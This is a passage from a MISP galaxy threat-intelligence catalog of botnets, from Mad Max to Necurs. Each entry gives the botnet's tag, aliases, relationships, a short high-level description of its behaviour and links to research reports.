  • similar: misp-galaxy:tool="Mad Max" with estimative-language:likelihood-probability="likely"

Table 742. Table References

Links

https://news.softpedia.com/news/researchers-crack-mad-max-botnet-algorithm-and-see-in-the-future-506696.shtml

Pushdo

The tag is: misp-galaxy:botnet="Pushdo"

Pushdo has relationships with:

  • similar: misp-galaxy:malpedia="Pushdo" with estimative-language:likelihood-probability="likely"

Table 743. Table References

Links

https://labs.bitdefender.com/2013/12/in-depth-analysis-of-pushdo-botnet/

Simda

The tag is: misp-galaxy:botnet="Simda"

Simda has relationships with:

  • similar: misp-galaxy:malpedia="Simda" with estimative-language:likelihood-probability="likely"

Table 744. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA15-105A

Virut

The tag is: misp-galaxy:botnet="Virut"

Virut has relationships with:

  • similar: misp-galaxy:malpedia="Virut" with estimative-language:likelihood-probability="likely"

Table 745. Table References

Links

https://en.wikipedia.org/wiki/Virut

Bamital

The tag is: misp-galaxy:botnet="Bamital"

Bamital is also known as:

  • Mdrop-CSK

  • Agent-OCF

Table 747. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32%2FBamital

https://www.symantec.com/security-center/writeup/2010-070108-5941-99

Gafgyt

Linux.Gafgyt is a Trojan horse that opens a back door on the compromised computer and steals information. The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).

The tag is: misp-galaxy:botnet="Gafgyt"

Gafgyt is also known as:

  • Bashlite

Gafgyt has relationships with:

  • similar: misp-galaxy:tool="Gafgyt" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Bashlite" with estimative-language:likelihood-probability="likely"

Table 748. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/

https://www.symantec.com/security-center/writeup/2014-100222-5658-99

Sora

Big changes on the IoT malware scene. Security researchers have spotted a version of the Mirai IoT malware that can run on a vast range of architectures, and even on Android devices. This Mirai malware strain is called Sora, a strain that was first spotted at the start of the year. Initial versions were nothing out of the ordinary, and Sora’s original author soon moved on to developing the Mirai Owari version, shortly after Sora’s creation.

The tag is: misp-galaxy:botnet="Sora"

Sora is also known as:

  • Mirai Sora

Sora has relationships with:

  • variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"

Table 749. Table References

Links

https://www.bleepingcomputer.com/news/security/mirai-iot-malware-uses-aboriginal-linux-to-target-multiple-platforms/

Torii

We have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses. The developers of the botnet seek wide coverage and for this purpose they created binaries for multiple CPU architectures, tailoring the malware for stealth and persistence.

The tag is: misp-galaxy:botnet="Torii"

Torii has relationships with:

  • similar: misp-galaxy:malpedia="Torii" with estimative-language:likelihood-probability="likely"

Table 750. Table References

Links

https://blog.avast.com/new-torii-botnet-threat-research

https://www.bleepingcomputer.com/news/security/new-iot-botnet-torii-uses-six-methods-for-persistence-has-no-clear-purpose/

Persirai

A new Internet of Things (IoT) botnet called Persirai (Detected by Trend Micro as ELF_PERSIRAI.A) has been discovered targeting over 1,000 Internet Protocol (IP) Camera models based on various Original Equipment Manufacturer (OEM) products. This development comes on the heels of Mirai—an open-source backdoor malware that caused some of the most notable incidents of 2016 via Distributed Denial-of-Service (DDoS) attacks that compromised IoT devices such as Digital Video Recorders (DVRs) and CCTV cameras—as well as the Hajime botnet.

The tag is: misp-galaxy:botnet="Persirai"

Persirai has relationships with:

  • similar: misp-galaxy:malpedia="Persirai" with estimative-language:likelihood-probability="likely"

Table 751. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/

Chalubo

Since early September, SophosLabs has been monitoring an increasingly prolific attack targeting Internet-facing SSH servers on Linux-based systems that has been dropping a newly-discovered family of denial-of-service bots we’re calling Chalubo. The attackers encrypt both the main bot component and its corresponding Lua script using the ChaCha stream cipher. This adoption of anti-analysis techniques demonstrates an evolution in Linux malware, as the authors have adopted principles more common to Windows malware in an effort to thwart detection. Like some of its predecessors, Chalubo incorporates code from the Xor.DDoS and Mirai malware families.

The tag is: misp-galaxy:botnet="Chalubo"

Table 752. Table References

Links

https://news.sophos.com/en-us/2018/10/22/chalubo-botnet-wants-to-ddos-from-your-server-or-iot-device/

AESDDoS

Our honeypot sensors recently detected an AESDDoS botnet malware variant (detected by Trend Micro as Backdoor.Linux.AESDDOS.J) exploiting a server-side template injection vulnerability (CVE-2019-3396) in the Widget Connector macro in Atlassian Confluence Server, a collaboration software program used by DevOps professionals.

The tag is: misp-galaxy:botnet="AESDDoS"

Table 753. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/aesddos-botnet-malware-exploits-cve-2019-3396-to-perform-remote-code-execution-ddos-attacks-and-cryptocurrency-mining/

Arceus

A set of DDoS botnets.

The tag is: misp-galaxy:botnet="Arceus"

Arceus is also known as:

  • Katura

  • MyraV

  • myra

Mozi

Mozi infects new devices through weak telnet passwords and exploitation.

The tag is: misp-galaxy:botnet="Mozi"

Table 754. Table References

Links

https://blog.netlab.360.com/mozi-another-botnet-using-dht/

https://threatpost.com/mozi-botnet-majority-iot-traffic/159337/

https://securityintelligence.com/posts/botnet-attack-mozi-mozied-into-town/

UPAS-Kit

UPAS-Kit was advertised by auroras a/k/a vinny in the middle of June 2012 via exploit.in. Upas is the predecessor of Kronos. Marcus Hutchins helped create and, in partnership with another, sell malicious computer code, a/k/a malware, known as UPAS-Kit.

The tag is: misp-galaxy:botnet="UPAS-Kit"

UPAS-Kit is also known as:

  • Rombrast

Table 755. Table References

Links

https://research.checkpoint.com/2018/deep-dive-upas-kit-vs-kronos/

https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html

https://web.archive.org/web/20130120062602/http://onthar.in/articles/upas-kit-analysis/

https://regmedia.co.uk/2019/04/19/plea.pdf

Phorpiex

Proofpoint describes Phorpiex/Trik as an SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.

The tag is: misp-galaxy:botnet="Phorpiex"

Phorpiex is also known as:

  • Trik

Table 756. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

DDG

First activity observed in October 2017. DDG is a botnet with P2P capability that is targeting cryptocurrency mining (Monero).

The tag is: misp-galaxy:botnet="DDG"

DDG has relationships with:

  • similar: misp-galaxy:malpedia="DDG" with estimative-language:likelihood-probability="likely"

Table 757. Table References

Links

https://twitter.com/JiaYu_521/status/1204248344043778048

https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/

https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/

https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/

https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/

https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg

Glupteba

A multi-component botnet targeting Windows computers. Glupteba is known to steal user credentials and cookies, mine cryptocurrencies on infected hosts, and deploy and operate proxy components targeting Windows systems and IoT devices. The botnet has been observed targeting victims worldwide, including the US, India, Brazil and Southeast Asia. The Glupteba malware family is primarily distributed through pay-per-install (PPI) networks and via traffic purchased from traffic distribution systems (TDS).

The tag is: misp-galaxy:botnet="Glupteba"

Table 758. Table References

Links

https://blog.google/threat-analysis-group/disrupting-glupteba-operation/

Elknot

DDoS Botnet

The tag is: misp-galaxy:botnet="Elknot"

Elknot is also known as:

  • Linux/BillGates

  • BillGates

Table 759. Table References

Links

https://www.virusbulletin.com/conference/vb2016/abstracts/elknot-ddos-botnets-we-watched

https://www.virusbulletin.com/uploads/pdf/conference_slides/2016/Liu_Wang-vb-2016-TheElknotDDoSBotnetsWeWatched.pdf

Cyclops Blink

Advanced modular botnet that is reportedly linked to the Sandworm or Voodoo Bear advanced persistent threat (APT) group.

The tag is: misp-galaxy:botnet="Cyclops Blink"

Table 760. Table References

Links

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-054a

Abcbot

Botnet

The tag is: misp-galaxy:botnet="Abcbot"

Table 761. Table References

Links

https://blog.netlab.360.com/abcbot_an_evolving_botnet_en

Ripprbot

Botnet

The tag is: misp-galaxy:botnet="Ripprbot"

Table 762. Table References

Links

https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days

EnemyBot

In mid-March [2022], FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.

This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.

It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.

Enemybot has been seen targeting routers from Seowon Intech and D-Link, and exploits a recently reported iRZ router vulnerability to infect more devices.

The tag is: misp-galaxy:botnet="EnemyBot"

EnemyBot has relationships with:

  • similar: misp-galaxy:malpedia="EnemyBot" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Gafgyt" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Zeus" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Qbot" with estimative-language:likelihood-probability="likely"

Table 763. Table References

Links

https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/

https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot

https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet

https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers

Qbot

Discovered in 2008 and under constant development, with gaps in operational use in the wild; operators are occasionally known as GOLD LAGOON. Banking Trojan that steals financial data, browser information/hooks, keystrokes and credentials; described by CheckPoint as a “Swiss Army knife”. Known to leverage many other tools; for example, PowerShell and Mimikatz are used for self-propagation. Attempts obfuscation via legitimate process injection. Known to serve as a dropper for ProLock ransomware. Infection vectors are common, with malspam as the most frequent. Active in 2020 with two big campaigns: one from March to June, and a second starting in July and ongoing, as part of the latest Emotet campaign. A newer version appeared in August.

The tag is: misp-galaxy:botnet="Qbot"

Qbot is also known as:

  • QakBot

  • Pinkslipbot

Qbot has relationships with:

  • dropped: misp-galaxy:ransomware="ProLock" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:ransomware="BlackBasta" with estimative-language:likelihood-probability="likely"

Table 764. Table References

Links

https://www.cisa.gov/sites/default/files/publications/202010221030_QakBot%20TLPWHITE.pdf

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/

Dark.IoT

This malware is characterized by alternative DNS connections and connects to several *.lib domains using custom DNS servers.

The tag is: misp-galaxy:botnet="Dark.IoT"

Dark.IoT has relationships with:

  • variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

Table 765. Table References

Links

https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/

KmsdBot

Akamai Security Research has observed a new Golang malware which they named KmsdBot. The malware scans for open SSH ports and performs a simple dictionary attack against them. The researchers from Akamai monitored only DDoS activity, but also discovered the functionality to launch cryptomining. The malware has varied targets including the gaming industry, technology industry, and luxury car manufacturers.

The tag is: misp-galaxy:botnet="KmsdBot"

Table 766. Table References

Links

https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware

HinataBot

Akamai researchers on the Security Intelligence Response Team (SIRT) have discovered a new Go-based, DDoS-focused botnet. The malware appears to have been named “Hinata” by the malware author after a character from the popular anime series Naruto. We are calling it “HinataBot.” It looks like an attempt to rewrite Mirai in Go. The threat actors behind HinataBot originally distributed Mirai binaries.

The tag is: misp-galaxy:botnet="HinataBot"

HinataBot has relationships with:

  • similar: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

Table 767. Table References

Links

https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hinata_bot

3ve

3ve, pronounced as “Eve”, was a botnet that was halted in late 2018. 3ve utilized the malware packages Boaxxe and Kovter to infect a network of PCs. They were spread through emails and fake downloads, and once infected, the bots would generate fake clicks on online advertisements. The clicks would be used on fake websites, which hosted ads and then absorbed the ad revenue from the false impressions. Bots were able to mimic desktop and mobile traffic in order to evade detection, and went through several evolutions of tactics to grow over time. At its peak, the botnet controlled more than one million residential and corporate IP addresses, largely within Europe and North America.

The tag is: misp-galaxy:botnet="3ve"

Table 768. Table References

Links

https://en.wikipedia.org/wiki/3ve

7777-Botnet

7777-Botnet has been observed brute-forcing Microsoft Azure instances via Microsoft Azure PowerShell. The botnet has a unique pattern of opening port 7777 on infected devices, returning an “xlogin:” message. The botnet has been used for low-volume attacks against targets of all industry sectors at a global scale, almost exclusively targeting C-level employee logins. Due to the very low volume of around 2–3 login requests per week, the botnet is able to evade most security solutions.

The tag is: misp-galaxy:botnet="7777-Botnet"

Table 769. Table References

Links

https://gi7w0rm.medium.com/the-curious-case-of-the-7777-botnet-86e3464c3ffd

Amadey

Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called tasks) for all or specifically targeted computers compromised by the malware.

The tag is: misp-galaxy:botnet="Amadey"

Table 770. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AndroidBauts

AndroidBauts botnet is a network of infected Android devices that are used for promoting advertisements to users online. At one point, the number of infected devices was more than 550,000. The creators of the AndroidBauts botnet are able to gather data regarding the compromised devices - both software and hardware.

The tag is: misp-galaxy:botnet="AndroidBauts"

Table 771. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/Steckbriefe/Bauts/AndroidBauts.html

Andromeda

Andromeda botnet, also known as Gamarue or Wauchos, was first introduced to the public in 2011. During this time it was used to distribute large quantities of malware. According to Microsoft the Andromeda botnet was used to spread more than 80 malware families including ransomware, worms, and more. Andromeda is a modular malware, meaning additional components can be purchased to provide extra functionality.

The tag is: misp-galaxy:botnet="Andromeda"

Andromeda is also known as:

  • Gamarue

  • Wauchos

Table 772. Table References

Links

https://blogs.blackberry.com/en/2020/05/threat-spotlight-andromeda

https://en.wikipedia.org/wiki/Andromeda_(trojan)

ArrkiiSDK

ArrkiiSDK is a potentially unwanted application (PUA) for Android devices. Its functions include unauthorised user tracking, ad fraud and the silent installation of additional applications without the user’s permission. ArrkiiSDK relies on the user actively installing an infected application, which is normally hidden within another software package that appears completely harmless.

The tag is: misp-galaxy:botnet="ArrkiiSDK"

Table 773. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Avalanche

Avalanche refers to a large global network hosting infrastructure used by cyber criminals to conduct phishing and malware distribution campaigns and money mule schemes. Cyber criminals utilized Avalanche botnet infrastructure to host and distribute a variety of malware variants to victims, including the targeting of over 40 major financial institutions. Victims may have had their sensitive personal information stolen (e.g., user account credentials). Victims’ compromised systems may also have been used to conduct other malicious activity, such as launching denial-of-service (DoS) attacks or distributing malware variants to other victims’ computers. In addition, Avalanche infrastructure was used to run money mule schemes where criminals recruited people to commit fraud involving transporting and laundering stolen money or merchandise. Avalanche used fast-flux DNS, a technique to hide the criminal servers behind a constantly changing network of compromised systems acting as proxies.

The tag is: misp-galaxy:botnet="Avalanche"

Table 774. Table References

Links

https://www.cisa.gov/news-events/alerts/2016/12/01/avalanche-crimeware-service-infrastructure

Bayrob

Bayrob evolved from a backdoor trojan used for fraud into a cryptocurrency miner. Symantec discovered multiple versions of Bayrob malware, and witnessed Bayrob as it morphed from online fraud to a 300,000+ botnet for cryptocurrency mining.

The tag is: misp-galaxy:botnet="Bayrob"

Table 775. Table References

Links

https://www.bleepingcomputer.com/news/security/bayrob-malware-gang-had-elite-tactics-but-they-still-got-caught-anyway/

https://community.broadcom.com/symantecenterprise/viewdocument/bayrob-three-suspects-extradited-t?CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

Bedep

Bedep has been mostly observed in ad-fraud campaigns, although it can also generally load modules for different tasks. It was dropped by the Angler Exploit Kit.

The tag is: misp-galaxy:botnet="Bedep"

Table 776. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep

Bolek

Bolek is a malware from the Kbot/Carberp family. It is subject to frequent updates and has malicious capabilities which include self-spreading through USB and network shares, TOR network access, screen captures and web injects, and it uses asymmetric cryptography to secure network communications.

The tag is: misp-galaxy:botnet="Bolek"

Bolek has relationships with:

  • similar: misp-galaxy:botnet="KBOT" with estimative-language:likelihood-probability="likely"

Table 777. Table References

Links

https://www.bitsight.com/blog/bolek-an-evolving-botnet-targets-poland-and-ukraine

Carna

The Carna botnet was a botnet of 420,000 devices created by an anonymous hacker to measure the extent of the Internet. The data was collected by infiltrating Internet devices, especially routers, that used a default password or no password at all.

The tag is: misp-galaxy:botnet="Carna"

Table 778. Table References

Links

https://en.wikipedia.org/wiki/Carna_botnet

Code Shikara

Code Shikara is a computer worm, related to the Dorkbot family, that attacks through social engineering and is capable of spying on users' browsing activities, meanwhile stealing their personal online/offline information and/or credentials.

The tag is: misp-galaxy:botnet="Code Shikara"

Table 779. Table References

Links

https://en.wikipedia.org/wiki/Code_Shikara

Condi

DDoS-as-a-service botnet calling itself Condi. This malware employs several techniques to keep itself running on an infected system. At the same time, it also prevents infections from other botnets by attempting to terminate their processes. As is typical of Mirai-based botnets, this malware cannot survive a system reboot.

The tag is: misp-galaxy:botnet="Condi"

Table 780. Table References

Links

https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

Cooee

Cooee is a trojan pre-installed on some Phillips smartphones that displays annoying advertisements and downloads and installs different software without user knowledge.

The tag is: misp-galaxy:botnet="Cooee"

Table 781. Table References

Links

https://news.softpedia.com/news/trojan-found-preinstalled-on-the-firmware-of-some-phillips-s307-android-smartphones-499177.shtml

Coreflood

Coreflood is a trojan horse and botnet created by a group of Russian hackers and released in 2010. The FBI included on its list of infected systems approximately 17 state or local government agencies, including one police department; three airports; two defense contractors; five banks or financial institutions; approximately 30 colleges or universities; approximately 20 hospital or health care companies; and hundreds of businesses. It is present on more than 2.3 million computers worldwide and as of May 2011 remains a threat.

The tag is: misp-galaxy:botnet="Coreflood"

Table 782. Table References

Links

https://en.wikipedia.org/wiki/Coreflood

Crackonosh

In 2021 Crackonosh has been found in 222,000 compromised computers that were used to download illegal, torrented versions of popular video games. Crackonosh successfully operated for years because it had built-in mechanisms to disable security software and updates, which made it difficult for users to detect and remove the program. The malware is thought to have originated in the Czech Republic, but it had a global reach.

The tag is: misp-galaxy:botnet="Crackonosh"

Table 783. Table References

Links

https://finance.yahoo.com/news/monero-mining-malware-crackonosh-infected-192448133.html

FluBot

FluBot is a remote control and info stealer malware. It has the ability to read and send SMS messages, delete apps, and execute arbitrary commands. It is often distributed through SMS messages. PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for its C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.

The tag is: misp-galaxy:botnet="FluBot"

FluBot is also known as:

  • Cabassous

  • FakeChat

Table 784. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot

FritzFrog

FritzFrog is a decentralized botnet that uses P2P protocols to distribute control over all of its nodes, thereby avoiding having one controller or single point of failure.

The tag is: misp-galaxy:botnet="FritzFrog"

Table 785. Table References

Links

https://en.wikipedia.org/wiki/FritzFrog

Gootkit

Gootkit is a trojan that steals confidential information and allows criminals to take control of infected systems remotely. Gootkit can also be used to install additional malware, such as Emotet. This botnet is a type of malware bot that may perform many malicious tasks, such as downloading and executing additional malware, receiving commands from a control server and relaying specific information and telemetry back to the control server, updating or deleting itself, stealing login and password information, logging keystrokes, participating in a Distributed Denial of Service (DDoS) attack, or locking and encrypting the contents of your computer and demanding payment for its safe return.

The tag is: misp-galaxy:botnet="Gootkit"

Table 786. Table References

Links

https://www.fortiguard.com/encyclopedia/botnet/7630462

Great Cannon

The Great Cannon of China is an Internet attack tool that is used by the Chinese government to launch distributed denial-of-service attacks on websites by performing a man-in-the-middle attack on large amounts of web traffic and injecting code which causes the end-user’s web browsers to flood traffic to targeted websites. According to the researchers at the Citizen Lab, the International Computer Science Institute, and Princeton University’s Center for Information Technology Policy, who coined the term, the Great Cannon hijacks foreign web traffic intended for Chinese websites and re-purposes it to flood targeted web servers with enormous amounts of traffic in an attempt to disrupt their operations.

The tag is: misp-galaxy:botnet="Great Cannon"

Table 787. Table References

Links

https://en.wikipedia.org/wiki/Great_Cannon

Hail Mary Cloud

The Hail Mary Cloud was, or is, a password guessing botnet, which used a statistical equivalent to brute force password guessing. The botnet ran from possibly as early as 2005, and certainly from 2007 until 2012 and possibly later. The botnet was named and documented by Peter N. M. Hansteen. The principle is that a botnet can try several thousands of more likely passwords against thousands of hosts, rather than millions of passwords against one host. Since the attacks were widely distributed, the frequency on a given server was low and was unlikely to trigger alarms. Moreover, the attacks come from different members of the botnet, thus decreasing the effectiveness of both IP based detection and blocking.

The tag is: misp-galaxy:botnet="Hail Mary Cloud"

Table 788. Table References

Links

https://en.wikipedia.org/wiki/Hail_Mary_Cloud

Joker

Joker is a trojan that is included in several unsuspecting apps that have been offered via the Google Play Store, among others. The malware silently interacts with ad networks to perform clicks on ad banners and subscribe to paid premium services. To do this, Joker is able to read SMS messages, contact lists and device information from the victim system. It collects data from infected systems, intercepts sensitive communications and transmits the information to a remote attacker.

The tag is: misp-galaxy:botnet="Joker"

Table 789. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/Steckbriefe/Joker/Joker.html

KBOT

KBOT penetrates users’ computers via the Internet or a local network, or from infected external media. After the infected file is launched, the malware gains a foothold in the system, writing itself to Startup and the Task Scheduler, and then deploys web injects to try to steal the victim’s bank and personal data. For the same purpose, KBOT can download additional stealer modules that harvest and send to the C&C server almost full information about the user: passwords/logins, cryptowallet data, lists of files and installed applications, and so on.

The tag is: misp-galaxy:botnet="KBOT"

Table 790. Table References

Links

https://securelist.com/kbot-sometimes-they-come-back/96157/

https://cofense.com/blog/bolek-leaked-carberp-kbot-source-code-complicit-new-phishing-campaigns/

Linux.Darlloz

Linux.Darlloz is a worm which infects Linux embedded systems. Linux.Darlloz was first discovered by Symantec in 2013. Linux.Darlloz targets the Internet of Things and infects routers, security cameras and set-top boxes by exploiting a PHP vulnerability. The worm was based on proof-of-concept code that was released in October 2013. Linux.Darlloz exploits the vulnerability CVE-2012-1823 in order to compromise systems. Linux.Darlloz was later found in March 2014 to have started mining cryptocurrencies such as Mincoin and Dogecoin. Linux.Aidra, the malware that Linux.Darlloz attempts to usurp, targets smaller devices, specifically cable and DSL modems, as do some of the variants of Darlloz. The worm adds them to a botnet, which can be utilized by the attackers to perform DDoS attacks.

The tag is: misp-galaxy:botnet="Linux.Darlloz"

Table 791. Table References

Links

https://en.wikipedia.org/wiki/Linux.Darlloz

https://www.wired.com/2014/01/spime-watch-linux-darlloz-internet-things-worm/

Marcher

Marcher is a banking trojan for Android devices. Researchers at Dutch security firm Securify have conducted a detailed analysis of the Android banking Trojan known as Marcher and discovered that a single botnet has managed to steal a significant number of payment cards. Securify has identified nine Marcher botnets over the last 6 months, and each of them has been provided with new modules and targeted web injects by the Trojan’s creators.

The tag is: misp-galaxy:botnet="Marcher"

Table 792. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

https://www.securityweek.com/thousands-android-devices-infected-marcher-trojan/

Matsnu

Matsnu is a malware downloader. The malware downloaded may include the banking trojans Citadel and URLZone/Bebloh. Matsnu can also be expanded with additional functions using plug-ins. One of these plug-ins is designed to capture access data for e-mail accounts and FTP programs and pass this information to the operator of the malware.

The tag is: misp-galaxy:botnet="Matsnu"

Table 793. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

https://threatpost.com/matsnu-botnet-dga-discovers-power-of-words/109426/

Methbot

Methbot was an advertising fraud scheme. Methbot was first tracked in 2015 by cybersecurity firm White Ops, and the botnet saw rapidly increased activity in 2016. The botnet originated in Russia (though it was not state sponsored), and utilized foreign computers and networks in Europe and North America. The infrastructure consisted of 571,904 dedicated IPs, 6,000 domains, and 250,267 distinct URLs, each of which could only house a video ad, and used variants of the names of famous publishers to fool those looking into the domains. This allowed the operators to game the system, leading ad selection algorithms to select these fake web pages over larger corporate pages from legitimate companies, and to charge advertisers at a premium. About 570,000 bots were used to execute clicks on those websites, “watching” up to 300 million video ads a day while the bots mimicked normal computer user behavior. Estimated clicks generally reached between 200 and 300 million per day. The botnet relied on data servers instead of the infected PCs and mobile devices that more traditional botnets rely on.

The tag is: misp-galaxy:botnet="Methbot"

Table 794. Table References

Links

https://en.wikipedia.org/wiki/Methbot

Metulji

The Metulji botnet, discovered in June 2011, is a botnet mainly involved in cyberscamming and denial of service attacks. Before the botnet itself was dismantled, it consisted of over 12 million individual zombie computers infected with the Butterfly Bot, making it, as of June 2011, the largest known botnet. It is not known what type of computers are vulnerable, or how to tell if a computer is a part of this botnet.

The tag is: misp-galaxy:botnet="Metulji"

Table 795. Table References

Links

https://en.wikipedia.org/wiki/Metulji_botnet

Mevade

The Mevade Botnet, also known as Sefnit or SBC, is a massive botnet. Its operators are unknown and its motives seem to be multi-purpose. In late 2013 the Tor anonymity network saw a very sudden and significant increase in users, from 800,000 daily to more than 5,000,000. A botnet was suspected and fingers pointed at Mevade. Trend Micro reported that its Smart Protection Network saw a Tor module being distributed to Mevade Trojans.

The tag is: misp-galaxy:botnet="Mevade"

Mevade is also known as:

  • Sefnit

  • SBC

Table 796. Table References

Links

https://en.wikipedia.org/wiki/Mevade_Botnet

MobiDash

MobiDash is a piece of adware for Android devices. The user is shown advertisements without their consent. Mobidash can also make calls in the background.

The tag is: misp-galaxy:botnet="MobiDash"

Table 797. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Mutabaha

Mutabaha is a Trojan for Windows devices. It downloads and installs Outfire, a Chromium-based browser that pretends to be a version of the Google Chrome browser. Mutabaha is able to drain data and manipulate advertisements. Mutabaha is downloaded and installed by another malware. As a rule, this dropper is removed after the malware has been installed, making it almost impossible to trace the infection.

The tag is: misp-galaxy:botnet="Mutabaha"

Table 798. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

MyDoom

MyDoom is a malicious program that opens a backdoor to the infected device. Through this backdoor the attacker can gain access to the system and carry out further actions. The attack possibilities are diverse and range from information theft to the reloading of additional malware. MyDoom adds infected computers to a botnet and then carries out distributed denial of service (DDoS) attacks. When the worm takes control over the victim’s OS, it then opens various ports and provides a backdoor to invite even more malware in.

The tag is: misp-galaxy:botnet="MyDoom"

Table 799. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

https://nordvpn.com/blog/mydoom-virus/

Necurs

The Necurs botnet is a distributor of many pieces of malware, most notably Locky. Around June 1, 2016, the botnet went offline, perhaps due to a glitch in the command and control server running Necurs. However, three weeks later, Jon French from AppRiver discovered a spike in spam emails, signifying either a temporary spike in the botnet’s activity or return to its normal pre-June 1 state. In a 2020 report, it was noted to have particularly targeted India, Southeast Asia, Turkey and Mexico.

The tag is: misp-galaxy:botnet="Necurs"

Table 800. Table References

Links

https://en.wikipedia.org/wiki/Necurs_botnet

Nitol

